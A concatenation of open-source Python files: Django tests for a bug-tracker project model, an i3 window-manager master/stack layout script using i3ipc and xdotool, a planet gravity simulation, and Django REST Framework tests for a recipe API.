def test_project_set_status(self):
"""Test the set_status project method"""
self.project.set_status('ON-GOING')
self.assertEqual(self.project.status, 'ON-GOING')
with self.assertRaises(ValueError):
self.project.set_status('NON_EXISTING_ENUM')
def test_project_status_tuples(self):
"""Test the status_tuples property"""
for st in self.project.status_tuples:
self.assertEqual(Project.STATUS_CLASSES[st[0]], st[1])
def test_project_get_active(self):
"""Test the get_active class method"""
Project.objects.create(title='Test2', _status='PAUSED')
Project.objects.create(title='Test3', _status='CLOSED')
Project.objects.create(title='Test4', _status='FINISHED')
actives = Project.get_active()
self.assertQuerysetEqual(set(actives), {str(self.project)})
def test_project_active_bugs(self):
"""Test the active_bugs project method"""
project = mixer.blend(Project)
b1 = mixer.blend(Bug, project=project, _status='WAITING')
b2 = mixer.blend(Bug, project=project, _status='BEING WORKED')
b3 = mixer.blend(Bug, project=project, _status='FIXED')
b4 = mixer.blend(Bug, project=project, _status='CLOSED')
active_bugs = project.active_bugs
self.assertIn(b1, active_bugs)
self.assertIn(b2, active_bugs)
self.assertNotIn(b3, active_bugs)
self.assertNotIn(b4, active_bugs)
p2 = Project.objects.create(title="Proj")
self.assertFalse(p2.active_bugs.exists())
``` |
{
"source": "JoaoAPS/i3-master-stack",
"score": 2
} |
#### File: JoaoAPS/i3-master-stack/i3_master_layout.py
```python
import argparse
import configparser
import os
import shutil
import subprocess
from pprint import pprint
from time import sleep
import i3ipc
import i3_swallow
rootMark = "root"
masterMark = "master"
slaveMark = "slave"
class I3MasterConfig(object):
def __init__(self):
self.terminal = 'Alacritty'
self.screenWidth = 1300
self.screenHeight = 800
self.posX = 310
self.posY = 160
        self.firstScreenPercent = 14  # width difference between the master and slave areas (unit: ppt)
self.limitWindowOnMaster = 2
self.isEnableSwallow = True
        self.isSwapMasterOnNewInstance = True  # a new window opened on the master side becomes the new master
pass
def dumpNode(node):
result = {}
result["type"] = node["type"]
result["window"] = node["window"]
result["layout"] = node["layout"]
result["percent"] = node["percent"]
result["nodes"] = []
if(node.get('marks') != None):
result['marks'] = node['marks']
if node.get("window_properties") != None:
result["title"] = node["window_properties"]["instance"] + \
" - " + node["window_properties"]["title"]
if len(node["nodes"]) > 0:
result["nodes"] = []
for node in node["nodes"]:
result["nodes"].append(dumpNode(node))
if(len(node["floating_nodes"]) > 0):
result["floating_nodes"] = []
for node in node["floating_nodes"]:
result["floating_nodes"].append(dumpNode(node))
return result
def dumpWorkSpace(workspace: i3ipc.Con):
result = {}
result["types"] = workspace["type"]
result["workspace_layout"] = workspace["workspace_layout"]
if len(workspace["nodes"]) >= 0:
result["nodes"] = []
for node in workspace["nodes"]:
result["nodes"].append(dumpNode(node))
pass
if len(workspace["floating_nodes"]) >= 0:
result["floating_nodes"] = []
for node in workspace["floating_nodes"]:
result["floating_nodes"].append(dumpNode(node))
pass
pass
pprint(workspace)
pprint(result)
class WorkspaceData(object):
def __init__(self, num: int):
self.num = num
self.swapNodeId = 0
self.masterWidth = 0
self.firstWindowId = 0
self.callback = None
self.isSwallowNext = False
self.isDisable = False
self.slaveMark = slaveMark+"_"+str(num)
self.masterMark = masterMark+"_"+str(num)
self.rootMark = rootMark+"_"+str(num)
pass
class I3MasterLayout(object):
def __init__(self, i3: i3ipc.Con, config: I3MasterConfig, debug=False):
self.i3 = i3
self.masterWidth = 0
self.config=config
self.debug = debug
self.callbacks = {}
self.workSpaceDatas = {}
self.isSwapMasterOnNewInstance = self.config.isSwapMasterOnNewInstance
self.isSwallowNext = False
pass
def unMarkMasterNode(self, node):
for mark in node.marks:
if mark == masterMark:
self.i3.command('[con_id=%s] unmark' % (node.id))
return True
for node in node.nodes:
if(self.unMarkMasterNode(node)):
return True
return False
def getWorkSpaceData(self, workspaceNum) -> WorkspaceData:
ws = self.workSpaceDatas.get(workspaceNum)
if ws == None:
ws = WorkspaceData(workspaceNum)
self.workSpaceDatas[workspaceNum] = ws
return ws
def getWorkSpaceMark(self, markName, workspaceName):
return markName+"_"+str(workspaceName)
def findNextNodeToMaser(self, node):
if(node.window != None):
return node
for node in node.nodes:
if(node.window != None):
return node
else:
result = self.findNextNodeToMaser(node)
if result != None:
return result
return None
def getAllChildWindow(self, root):
result = []
for node in root.nodes:
if(node.window != None):
result.append(node)
else:
result = result + self.getAllChildWindow(node)
return result
def findChildNodeByMarked(self, node, mark) -> i3ipc.Con:
for child in node.nodes:
if(mark in child.marks):
return child
else:
result = self.findChildNodeByMarked(child, mark)
if result != None:
return result
return None
def findChildNodeById(self, node, conId) -> i3ipc.Con:
for child in node:
if child.id == conId :
return child
elif child.nodes != None:
result = self.findChildNodeById(child.nodes, conId)
if result != None:
return result
return None
def validateMasterAndSlaveNode(self, workspace):
root = workspace
if(root.layout == 'splitv'):
self.i3.command('[con_id=%s] layout splith' % root.id)
masterNode = None
slaveNode = None
workspaceData = self.getWorkSpaceData(workspace.num)
masterNode = self.findChildNodeByMarked(root, workspaceData.masterMark)
if(masterNode != None and len(root.nodes) == 1):
            # check len(root.nodes) == 1 because i3 may have merged the master node into another container,
            # in which case we need to find a better master node among the root nodes
root = masterNode.parent
elif (len(root.nodes) > 0):
masterNode = root.nodes[0]
if(len(root.nodes) > 1):
            # check whether the current root already has a slave node
for node in root.nodes:
if workspaceData.slaveMark in node.marks:
slaveNode = node
            # if not, set the second node as the slave
if(slaveNode == None):
slaveNode = root.nodes[1]
if(slaveNode == None and masterNode != None):
            # try to find the best candidates for the master and slave nodes;
            # special case: i3 stacks slave nodes inside the master node when there are too many windows
allChild = self.getAllChildWindow(masterNode)
if(len(allChild) >= 2):
if(masterNode.id != allChild[0].id):
self.i3.command('[con_id=%s] unmark %s' %
(masterNode.id, workspaceData.masterMark))
root = masterNode.parent
masterNode = allChild[0]
self.i3.command('[con_id=%s] mark %s' %
(masterNode.id, workspaceData.masterMark))
self.i3.command('[con_id=%s] mark %s' %
(root.id, workspaceData.rootMark))
if(len(root.nodes) > 1):
slaveNode = root.nodes[1]
else:
# we can't find the best slave node
pass
# check master node
if(masterNode != None):
if(root.layout == 'splitv'):
                # if i3 put the master node inside another container, move it back up to the parent node
                self.i3.command('[con_id=%s] move left' % masterNode.id)
if not workspaceData.masterMark in masterNode.marks:
self.i3.command('[con_id=%s] mark %s' %
(masterNode.id, workspaceData.masterMark))
if not workspaceData.masterMark in root.marks:
self.i3.command('[con_id=%s] mark %s' %
(root.id, workspaceData.rootMark))
            # check the children of masterNode when the master itself is not a window
if(masterNode.window == None):
allChild = self.getAllChildWindow(masterNode)
if(
len(allChild) > self.config.limitWindowOnMaster and
slaveNode != None
):
                    # remove extra child nodes from the master if it holds too many
for node in allChild[self.config.limitWindowOnMaster:]:
if(node.window != None):
self.i3.command('[con_id=%s] move window to mark %s' % (
node.id, workspaceData.slaveMark))
self.i3.command('[con_id=%s] focus' % (node.id))
pass
if(slaveNode != None and masterNode != None):
# mark slave
if not workspaceData.slaveMark in slaveNode.marks:
self.i3.command('[con_id=%s] mark %s' %
(slaveNode.id, workspaceData.slaveMark))
# if(slaveNode.layout=='splitv'):
# i3.command('[con_id=%s] layout splith' % slaveNode.id)
            # create the layout for the slave container
if(slaveNode.window != None):
self.i3.command('[con_id=%s] split vertical' % slaveNode.id)
if(len(root.nodes) > 2):
for node in root.nodes:
                    # move all remaining child nodes from root to the slave container
if node.id != masterNode.id and node.id != slaveNode.id:
self.i3.command('[con_id=%s] move %s to mark %s'
% (node.id,
"container" if node.window == None else "window",
workspaceData.slaveMark))
if(node.window != None):
self.i3.command('[con_id=%s] focus' % (node.id))
self.getMasterSize()
pass
def on_new(self, event):
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
if workspaceData.isDisable:
return
window = self.i3.get_tree().find_focused()
# print("NEW ===============")
# pprint(vars(workspaceData))
# print(window.parent.ipc_data)
# dumpWorkSpace(workspace.ipc_data)
if (
len(workspace.nodes) == 1 and
len(workspace.nodes[0].nodes) == 0 and
window.name == self.config.terminal and
len(workspace.floating_nodes) == 0
):
workspaceData.masterWidth = 0
workspaceData.firstWindowId = window.id
event.container.command('floating enable')
event.container.command(
"exec xdotool windowsize %d %s %s;exec xdotool windowmove %d %s %s"
% (window.window, self.config.screenWidth, self.config.screenHeight, window.window, self.config.posX, self.config.posY))
if (
workspaceData.firstWindowId != 0 and
window.floating == "auto_off" and
len(workspace.floating_nodes) >= 1 and
len(workspace.floating_nodes[0].nodes) >= 1 and
len(workspace.nodes) == 1 and
len(workspace.nodes[0].nodes) == 0
):
# when a second node opens, switch the first node back to tiling mode
firstNode = self.findChildNodeById(
workspace.floating_nodes, workspaceData.firstWindowId)
if(
firstNode != None and
firstNode.id != window.id and
## only auto-change for terminal instances
firstNode.ipc_data["window_properties"]["instance"] == self.config.terminal
):
firstWindowId = firstNode.id
self.i3.command('[con_id=%s] floating disable' % firstWindowId)
self.i3.command('[con_id=%s] move left' % firstWindowId)
self.i3.command('[con_id=%s] mark %s' % (
firstWindowId, self.getWorkSpaceMark(masterMark, workspace.num)))
if (self.config.firstScreenPercent > 0):
self.i3.command('[con_id=%s] resize grow width %s px or %s ppt '
% (firstWindowId, self.config.firstScreenPercent, self.config.firstScreenPercent))
event.container.command('split vertical')
workspaceData.firstWindowId = 0
pass
if(self.isSwapMasterOnNewInstance):
self.i3.command('[con_id=%s] mark %s' %
(window.parent.id, workspaceData.rootMark))
self.swapMaster(event)
pass
# the second node is split vertically automatically
elif (
len(window.parent.nodes) == 2 and
window.parent.layout == 'splith' and
workspaceData.rootMark not in window.parent.marks
):
event.container.command('split vertical')
pass
# swap master and push the old master onto the top of the slave stack
if self.isSwapMasterOnNewInstance:
isRootParent= workspaceData.rootMark in window.parent.marks
masterNode = self.findChildNodeByMarked(
workspace, workspaceData.masterMark)
if self.isSwallowNext:
self.isSwallowNext = False
if(masterNode!=None):
print("resizeMaster")
self.resizeMaster(masterNode.id)
isRootParent = False
pass
if(isRootParent):
slaveNode = self.findChildNodeByMarked(
workspace, workspaceData.slaveMark)
if(masterNode != None and masterNode.id != window.id):
if(slaveNode != None and len(slaveNode.nodes)>0):
# push to slave stack
firstNode = slaveNode.nodes[0]
self.i3.command('[con_id=%s] focus' %
(firstNode.id))
self.i3.command('[con_id=%s] move window to mark %s' % (
masterNode.id, workspaceData.slaveMark))
self.i3.command('[con_id=%s] swap container with con_id %d'
% (masterNode.id, firstNode.id))
pass
else:
# no slave stack
self.i3.command('[con_id=%s] mark %s' %
(masterNode.id, workspaceData.slaveMark))
if len(window.parent.nodes)>0:
self.i3.command('[con_id=%s] swap container with con_id %d'
% (masterNode.id, window.id))
self.i3.command('[con_id=%s] move left'% ( window.id))
self.i3.command('[con_id=%s] unmark %s' %
(masterNode.id, workspaceData.masterMark))
self.i3.command('[con_id=%s] mark %s' %
(window.id, workspaceData.masterMark))
if(workspaceData.masterWidth != 0):
self.i3.command('[con_id=%s] resize set %s 0'
% (window.id, workspaceData.masterWidth))
self.i3.command('[con_id=%s] focus' % (masterNode.id))
self.i3.command('[con_id=%s] focus' % (window.id))
workspaceData.swapNodeId = masterNode.id
pass
return
pass
self.validateMasterAndSlaveNode(workspace)
pass
def gotoMaster(self, event):
window = self.i3.get_tree().find_focused()
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
masterNode = self.findChildNodeByMarked(
workspace, workspaceData.masterMark)
if(masterNode != None):
lastSwapNodeId = workspaceData.swapNodeId
if(lastSwapNodeId != 0):
isInMaster = masterNode.window != None and (
workspaceData.masterMark in window.marks)
if(isInMaster == False):
childs = self.getAllChildWindow(masterNode)
for node in childs:
if(window.id == node.id):
isInMaster = True
break
pass
if(isInMaster):
self.i3.command('[con_id=%s] focus' %
(lastSwapNodeId))
workspaceData.swapNodeId = 0
return
pass
if(masterNode.window != None):
self.i3.command('[con_id=%s] focus' % (masterNode.id))
workspaceData.swapNodeId = window.id
pass
if(len(masterNode.nodes) > 0 and masterNode.nodes[0].window != None):
self.i3.command('[con_id=%s] focus' % (masterNode.nodes[0].id))
workspaceData.swapNodeId = window.id
pass
pass
def swap2Node(self, node1Id: int, node2Id: int, workspaceData: WorkspaceData):
self.i3.command('[con_id=%s] swap container with con_id %s' %
(node1Id, node2Id))
self.i3.command('[con_id=%s] unmark %s' %
(node1Id, workspaceData.masterMark))
self.i3.command('[con_id=%s] mark --add %s' %
(node2Id, workspaceData.masterMark))
self.i3.command('[con_id=%s] focus' % (node2Id))
workspaceData.swapNodeId = node1Id
self.emmit('master_change', node2Id)
def swapMaster(self, event):
window = self.i3.get_tree().find_focused()
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
masterNode = self.findChildNodeByMarked(
workspace, workspaceData.masterMark)
if(masterNode != None):
lastSwapNodeId = workspaceData.swapNodeId
if(self.config.limitWindowOnMaster == 1 or len(masterNode.nodes) == 0):
if(lastSwapNodeId != 0 and workspaceData.masterMark in window.marks):
self.swap2Node(
masterNode.id, lastSwapNodeId, workspaceData)
pass
else:
self.swap2Node(masterNode.id, window.id,
workspaceData)
else:
# multiple children in master
childs = self.getAllChildWindow(masterNode)
isInMaster = False
for node in childs:
if(window.id == node.id):
isInMaster = True
break
if(isInMaster):
if(lastSwapNodeId != 0):
self.swap2Node(
window.id, lastSwapNodeId, workspaceData)
# workspaceData.swapNodeId = 0
else:
for node in childs:
if(node.id != window.id):
self.swap2Node(
window.id, node.id, workspaceData)
break
else:
if(len(childs) > 0 and childs[0].window != None):
masterNode = childs[0]
pass
self.swap2Node(masterNode.id, window.id, workspaceData)
pass
def getMasterSize(self):
window = self.i3.get_tree().find_focused()
workspace = window.workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
if (
workspaceData.masterMark in window.marks and
workspaceData.rootMark in window.parent.marks and
len(window.parent.nodes) == 2
):
workspaceData.masterWidth = int(window.rect.width)
pass
def resizeMaster(self, condId: int):
window = self.i3.get_tree().find_focused()
workspace = window.workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
if(workspaceData.masterWidth>0):
self.i3.command('[con_id=%s] resize set %s 0'
% (condId, workspaceData.masterWidth))
pass
# region Event Handler
def on(self, event_name, callback):
if self.callbacks is None:
self.callbacks = {}
if event_name not in self.callbacks:
self.callbacks[event_name] = [callback]
else:
self.callbacks[event_name].append(callback)
def emmit(self, event_name, data=None):
if self.callbacks is not None and event_name in self.callbacks:
for callback in self.callbacks[event_name]:
callback(data)
# endregion
def on_close(self, event):
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
if(workspaceData.isDisable):
return
allChild=workspace.leaves()
isCloseMaster = False
if(workspaceData.masterMark in event.container.marks):
isCloseMaster = True
self.validateMasterAndSlaveNode(workspace)
if(isCloseMaster):
focusWindow = self.i3.get_tree().find_focused()
if(focusWindow != None and focusWindow.window != None):
self.i3.command('[con_id=%s] move left' % (focusWindow.id))
self.i3.command('[con_id=%s] mark %s' %
(focusWindow.id, workspaceData.masterMark))
if(workspaceData.masterWidth != 0):
self.i3.command('[con_id=%s] resize set %s 0'
% (focusWindow.id, workspaceData.masterWidth))
else:
print("focus window null")
if(len(allChild)==1):
self.i3.command('[con_id=%s] mark %s' % (allChild[0].id,workspaceData.masterMark))
self.i3.command('[con_id=%s] mark %s' % (allChild[0].parent.id,workspaceData.rootMark))
pass
def on_move(self, event):
pass
def on_binding(self, event):
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData= self.getWorkSpaceData(workspace.num)
command = event.ipc_data["binding"]["command"].strip()
if(command == "nop swap master"):
self.swapMaster(event)
elif(command == "nop master toggle"):
workspaceData.isDisable = not workspaceData.isDisable
elif(command == "nop go master"):
self.gotoMaster(event)
elif("resize" in event.ipc_data["binding"]["command"]):
self.getMasterSize()
elif(self.debug):
if event.ipc_data["binding"]["command"] == "nop debug":
workspace = self.i3.get_tree().find_focused().workspace()
dumpWorkSpace(workspace.ipc_data)
if(workspaceData.isDisable):
return
self.validateMasterAndSlaveNode(workspace)
pass
pass
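# Illustrative i3 config bindings (not part of the original file) that emit the
# "nop ..." commands handled above; the exact key combinations are only an example:
#   bindsym $mod+m nop swap master
#   bindsym $mod+Shift+m nop master toggle
#   bindsym $mod+g nop go master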
def on_tick(self, event):
    pass
def on_focus(self, event):
    pass
# End class
i3 = i3ipc.Connection()
listHandler = []
masterConfig= I3MasterConfig()
def on_close(self, event):
for handler in (listHandler):
handler.on_close(event)
pass
def on_floating (self,event):
for handler in (listHandler):
handler.on_close(event)
pass
def on_new(self, event):
for handler in listHandler:
handler.on_new(event)
pass
def on_move(self, event):
for handler in listHandler:
handler.on_move(event)
pass
def on_focus(self, event):
for handler in listHandler:
handler.on_focus(event)
pass
def on_binding(self, event):
for handler in listHandler:
handler.on_binding(event)
pass
def on_tick(self, event):
for handler in listHandler:
handler.on_tick(event)
def main():
global listHandler
global masterConfig
parser = argparse.ArgumentParser()
parser.add_argument(
'--debug',
action='store_true',
help='Print debug messages to stderr'
)
args = parser.parse_args()
masterHander = I3MasterLayout(i3, masterConfig, args.debug)
swallowHander = i3_swallow.I3Swallow(
i3, masterConfig.isEnableSwallow, masterMark, masterHander)
if(masterConfig.isEnableSwallow):
listHandler.append(swallowHander)
listHandler.append(masterHander)
# Subscribe to events
i3.on("window::new", on_new)
i3.on("window::focus", on_focus)
i3.on("window::close", on_close)
i3.on("window::move", on_move)
i3.on("binding", on_binding)
i3.on("tick", on_tick)
i3.main()
def readConfig():
config_path = '%s/.config/i3/i3_master.ini' % os.environ['HOME']
dir = os.path.dirname(os.path.realpath(__file__))
if not os.path.isfile(config_path):
print("No config file in.")
# copy file
shutil.copy(dir+"/i3_master.ini", config_path)
pass
config = configparser.ConfigParser()
config.read(config_path)
global masterConfig
configData = config['config']
if(configData!=None):
masterConfig.terminal = configData.get(
'terminal', fallback=masterConfig.terminal)
masterConfig.posX = configData.getint(
'posX', fallback=masterConfig.posX)
masterConfig.posY = configData.getint(
'posY', fallback=masterConfig.posY)
masterConfig.screenWidth = configData.getint(
'screenWidth', fallback=masterConfig.screenWidth)
masterConfig.screenHeight = configData.getint(
'screenHeight', fallback=masterConfig.screenHeight)
masterConfig.isEnableSwallow = configData.getboolean(
'swallow', fallback=masterConfig.isEnableSwallow)
masterConfig.isSwapMasterOnNewInstance = configData.getboolean(
'slaveStack', fallback=masterConfig.isSwapMasterOnNewInstance)
masterConfig.firstScreenPercent = configData.getint(
'masterSizePlus', fallback=14)
masterConfig.limitWindowOnMaster = configData.getint(
'limitWindowOnMaster', fallback=masterConfig.limitWindowOnMaster)
pass
if __name__ == "__main__":
readConfig()
main()
``` |
{
"source": "JoaoAPS/PlanetSimulation",
"score": 3
} |
#### File: JoaoAPS/PlanetSimulation/main.py
```python
from src.App import App
from src.Planet import Planet
from src.vecN import Vec3
def main():
# figure-eight orbit (commented out)
# pos = 10 * Vec3(-0.97000436, 0.24308753)
# vel2 = 10 * Vec3(-0.93240737, -0.86473146)
# vel13 = 10 * Vec3(0.4662036850, 0.4323657300)
# planets = [
# Planet(1000, pos, vel13, (200, 20, 20)),
# Planet(1000, Vec3(), vel2, (20, 200, 20)),
# Planet(1000, -pos, vel13, (20, 20, 200))
# ]
planets = [
Planet(1000, Vec3(50), Vec3(-10, 5), (200, 20, 20)),
Planet(1000, Vec3(5, -15), Vec3(7, 0), (20, 200, 20)),
Planet(1000, Vec3(0, 30), Vec3(1, -5), (20, 20, 200)),
]
planets = [
Planet(5000, Vec3(20), Vec3(-5, -5), (200, 20, 20)),
Planet(5000, Vec3(-20), Vec3(5, 5), (20, 200, 20)),
]
app = App()
app.universe.setPlanets(planets)
app.run()
if __name__ == '__main__':
main()
```
#### File: PlanetSimulation/src/Planet.py
```python
from .vecN import Vec3
from .utils import assertType
class Planet:
"""Represents a planet"""
def __init__(self, mass, pos, vel, color=(0, 0, 0), radius=2):
assertType('mass', mass, [float, int])
assertType('position', pos, Vec3)
assertType('velocity', vel, Vec3)
self.mass = float(mass)
self.pos = pos
self.vel = vel
self.trajectory = []
self.color = color
self.radius = radius
def __str__(self):
return f'Planet at ({self.pos.x}, {self.pos.y}, {self.pos.z})'
__repr__ = __str__
def update(self, field, dt):
"""Update properties one time step following gravitational field"""
self.trajectory.append(self.pos)
self.pos += self.vel * dt
self.vel += field * dt
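# Illustrative usage (not part of the original file): a minimal sketch of how
# update() might be driven, assuming a hypothetical gravity_field() helper that
# sums Newtonian accelerations from the other planets (the real field
# computation lives in the Universe class, which is not shown here, and this
# sketch assumes Vec3 exposes a norm() method):
#
#   def gravity_field(target, planets, G=1.0):
#       field = Vec3()
#       for other in planets:
#           if other is not target:
#               r = other.pos - target.pos
#               field += (G * other.mass / r.norm() ** 3) * r
#       return field
#
#   for p in planets:
#       p.update(gravity_field(p, planets), dt=0.01)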
```
#### File: PlanetSimulation/src/utils.py
```python
def assertType(varName, var, correct_type):
"""Raises a TypeError if 'var' is not of type 'correct_type'"""
correct = False
if type(correct_type) is list or type(correct_type) is tuple:
for t in correct_type:
if type(var) is t:
correct = True
else:
correct = type(var) is correct_type
if not correct:
raise TypeError(
varName + ' must be of type ' + str(correct_type) +
', but type ' + str(type(var)) + ' was passed!'
)
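# Quick usage illustration (not part of the original file):
#   assertType('mass', 3, [float, int])    # passes silently
#   assertType('mass', '3', [float, int])  # raises TypeError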
``` |
{
"source": "JoaoAPS/Recipes-API",
"score": 2
} |
#### File: recipe/tests/test_recipe_api.py
```python
import tempfile
import os
from PIL import Image
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
from rest_framework.test import APIClient
from rest_framework import status
from recipe.models import Recipe, Tag, Ingredient
from recipe.serializers import RecipeSerializer, RecipeDetailSerializer
RECIPE_LIST_URL = reverse('recipe:recipe-list')
# Helper functions
def recipe_detail_url(id):
return reverse('recipe:recipe-detail', args=[id])
def image_upload_url(id):
return reverse('recipe:recipe-upload-image', args=[id])
def sample_user(email='<EMAIL>', password='<PASSWORD>', name='Sample'):
return get_user_model().objects.create_user(
email=email, password=password, name=name
)
def sample_recipe(user, **params):
defaults = {
'title': 'Test Recipe',
'time_minutes': 5,
'price': 50.0
}
defaults.update(params)
return Recipe.objects.create(user=user, **defaults)
def sample_ingredient(user, name='Test Ing'):
return Ingredient.objects.create(user=user, name=name)
def sample_tag(user, name='Test Tag'):
return Tag.objects.create(user=user, name=name)
def sample_recipe_payload(**params):
defaults = {
'title': 'Test Recipe',
'time_minutes': 5,
'price': 50.0
}
defaults.update(params)
return defaults
class PublicRecipeApiTests(TestCase):
"""Tests for public requests on Recipe API"""
def setUp(self):
self.client = APIClient()
def test_unauthorized_retrieve_invalid(self):
"""Test that recipes cannot be retrieved by an unauthorized user"""
res = self.client.get(RECIPE_LIST_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeApiTests(TestCase):
"""Tests for private requests on Recipe API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>',
name='<NAME>'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_list_successful(self):
"""Test that an authenticated user can retrieve the recipes"""
sample_recipe(self.user)
recipe = sample_recipe(
self.user,
title='Test Recipe 2',
time_minutes=10,
price=15.00
)
recipe.ingredients.add(sample_ingredient(self.user))
recipe.tags.add(sample_tag(self.user))
serializer = RecipeSerializer(
Recipe.objects.all().order_by('title'),
many=True
)
res = self.client.get(RECIPE_LIST_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_recipes_limited_to_authenticated_user(self):
"""Test that the authenticated user get their recipes only"""
recipe = sample_recipe(self.user)
sample_recipe(
user=sample_user(),
title='Other Recipe',
time_minutes=7,
price=10.1
)
serializer = RecipeSerializer(recipe)
res = self.client.get(RECIPE_LIST_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0], serializer.data)
def test_retrieve_recipe_detail(self):
"""Test retrieving the recipe details"""
recipe = sample_recipe(self.user)
recipe.ingredients.add(sample_ingredient(self.user))
recipe.tags.add(sample_tag(self.user))
serializer = RecipeDetailSerializer(recipe)
res = self.client.get(recipe_detail_url(recipe.id))
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_retrieve_other_user_recipe_forbidden(self):
"""Test a user cannot retrive a recipe from another user"""
recipe = sample_recipe(sample_user())
res = self.client.get(recipe_detail_url(recipe.id))
self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)
def test_create_basic_recipe_successful(self):
"""Test creating a new recipe with no ingredients or tags assigned"""
payload = sample_recipe_payload(link='www.testlink.com')
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
self.assertTrue(
Recipe.objects.filter(user=self.user, **payload).exists()
)
# Test creating with no link
payload = sample_recipe_payload()
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
self.assertEqual(len(Recipe.objects.all()), 2)
self.assertTrue(
Recipe.objects.filter(user=self.user, **payload).exists()
)
def test_create_basic_recipe_invalid_payload(self):
"""Test refusing recipe creation with invalid payload"""
payloads = [
sample_recipe_payload(title=''),
sample_recipe_payload(time_minutes=-1),
sample_recipe_payload(time_minutes=5.4),
sample_recipe_payload(price=-1.0),
{
'time_minutes': 5,
'price': 50.0
},
{
'title': 'Test',
'price': 50.0
},
{
'title': 'Test',
'time_minutes': 5,
},
]
for payload in payloads:
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(len(Recipe.objects.all()), 0)
def test_create_full_recipe_successful(self):
"""Test creating a new recipe with ingredients and tags assigned"""
ingredient1 = sample_ingredient(self.user)
ingredient2 = sample_ingredient(self.user)
tag = sample_tag(self.user)
payload = sample_recipe_payload()
payload.update({
'ingredients': [ingredient1.id, ingredient2.id],
'tags': [tag.id]
})
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
self.assertEqual(recipe.ingredients.all().count(), 2)
self.assertEqual(recipe.tags.all().count(), 1)
self.assertIn(tag, recipe.tags.all())
self.assertIn(ingredient1, recipe.ingredients.all())
self.assertIn(ingredient2, recipe.ingredients.all())
def test_create_full_recipe_invalid_payload(self):
"""Test refusing full recipe creation with invalid payload"""
# dict.update() returns None, so build the invalid payloads explicitly
payloads = [
    dict(sample_recipe_payload(), ingredients=[1000]),
    dict(sample_recipe_payload(), tags=[1000]),
]
for payload in payloads:
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(len(Recipe.objects.all()), 0)
def test_update_recipe(self):
"""Test updating a recipe"""
# PUT
recipe = sample_recipe(user=self.user, price=10.00, time_minutes=10)
payload = sample_recipe_payload(price=50.00)
res = self.client.put(recipe_detail_url(recipe.id), payload)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(
Recipe.objects.get(id=recipe.id).price,
payload['price']
)
# PATCH
payload = {'time_minutes': 30}
res = self.client.patch(recipe_detail_url(recipe.id), payload)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(
Recipe.objects.get(id=recipe.id).time_minutes,
payload['time_minutes']
)
def test_filter_recipes_by_tags(self):
"""Test returning recipes with specific tags"""
recipe1 = sample_recipe(user=self.user, title="Test Recipe 1")
recipe2 = sample_recipe(user=self.user, title="Test Recipe 2")
recipe3 = sample_recipe(user=self.user, title="Test Recipe 3")
recipe4 = sample_recipe(user=self.user, title="Test Recipe 4")
tag1 = sample_tag(user=self.user, name="Tag1")
tag2 = sample_tag(user=self.user, name="Tag2")
tag3 = sample_tag(user=self.user, name="Tag3")
recipe1.tags.add(tag1)
recipe2.tags.add(tag2)
recipe3.tags.add(tag3)
res = self.client.get(
RECIPE_LIST_URL,
{'tags': f'{tag1.id},{tag2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
serializer4 = RecipeSerializer(recipe4)
self.assertEqual(len(res.data), 2)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
self.assertNotIn(serializer4.data, res.data)
def test_filter_recipe_by_ingredient(self):
"""Test returning recipes with specific ingredients"""
recipe1 = sample_recipe(user=self.user, title="Test Recipe 1")
recipe2 = sample_recipe(user=self.user, title="Test Recipe 2")
recipe3 = sample_recipe(user=self.user, title="Test Recipe 3")
recipe4 = sample_recipe(user=self.user, title="Test Recipe 4")
ingredient1 = sample_ingredient(user=self.user, name="Ingrident1")
ingredient2 = sample_ingredient(user=self.user, name="Ingrident2")
ingredient3 = sample_ingredient(user=self.user, name="Ingrident3")
recipe1.ingredients.add(ingredient1)
recipe2.ingredients.add(ingredient2)
recipe3.ingredients.add(ingredient3)
res = self.client.get(
RECIPE_LIST_URL,
{'ingredients': f'{ingredient1.id},{ingredient2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
serializer4 = RecipeSerializer(recipe4)
self.assertEqual(len(res.data), 2)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
self.assertNotIn(serializer4.data, res.data)
class RecipeImageUploadTests(TestCase):
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'<EMAIL>',
'<PASSWORD>'
)
self.client.force_authenticate(self.user)
